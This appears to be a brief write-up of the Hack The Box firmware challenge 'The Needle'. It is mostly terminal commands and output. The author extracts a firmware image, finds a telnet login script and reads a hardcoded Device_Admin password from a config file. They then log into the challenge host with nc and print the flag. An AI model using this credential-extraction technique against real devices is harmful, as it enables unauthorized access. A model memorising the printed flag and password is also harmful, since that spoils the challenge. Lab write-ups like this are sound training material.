๐The Needle
https://app.hackthebox.com/challenges/The%2520Needle
โฐโ file firmware.bin โโฏ
firmware.bin: Linux kernel ARM boot executable zImage (big-endian)โฐโ binwalk -e firmware.bin
...โฐโ grep -rn "./" -e login โโฏ
grep: ./squashfs-root/bin/busybox: binary file matches
./squashfs-root/bin/config_generate:231: set system.@system[-1].ttylogin='0'
./squashfs-root/etc/config/rpcd:2:config login
./squashfs-root/etc/inittab:3:::askconsole:/usr/libexec/login.sh
./squashfs-root/etc/profile:40:in order to prevent unauthorized SSH logins.
./squashfs-root/etc/scripts/telnetd.sh:7: if [ -f "/usr/sbin/login" ]; then
./squashfs-root/etc/scripts/telnetd.sh:9: telnetd -l "/usr/sbin/login" -u Device_Admin:$sign -i $lf &
grep: ./squashfs-root/lib/libc.so: binary file matches
...โฐโ find ./ -name sign โโฏ
./squashfs-root/etc/config/sign
./squashfs-root-0/etc/config/sign
...
โฐโ cat ./squashfs-root/etc/config/sign โโฏ
qS6-X/n]u>fVfAt!โฐโ nc 83.136.251.197 42886 โโฏ
๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ
ng-1874835-hwtheneedle-lhjwv-cf4d688c7-xlwxl login: Device_Admin
Device_Admin
Password: qS6-X/n]u>fVfAt!
ng-1874835-hwtheneedle-lhjwv-cf4d688c7-xlwxl:~$ ^[[30;49RLS
LS
-ash: LS: not found
ng-1874835-hwtheneedle-lhjwv-cf4d688c7-xlwxl:~$ ^[[30;49Rls
ls
flag.txt
ng-1874835-hwtheneedle-lhjwv-cf4d688c7-xlwxl:~$ ^[[30;49Rcat flag.txt
cat flag.txt
HTB{4_hug3_blund3r_d289a1_!!}
ng-1874835-hwtheneedle-lhjwv-cf4d688c7-xlwxl:~$ ^[[30;49RLast updated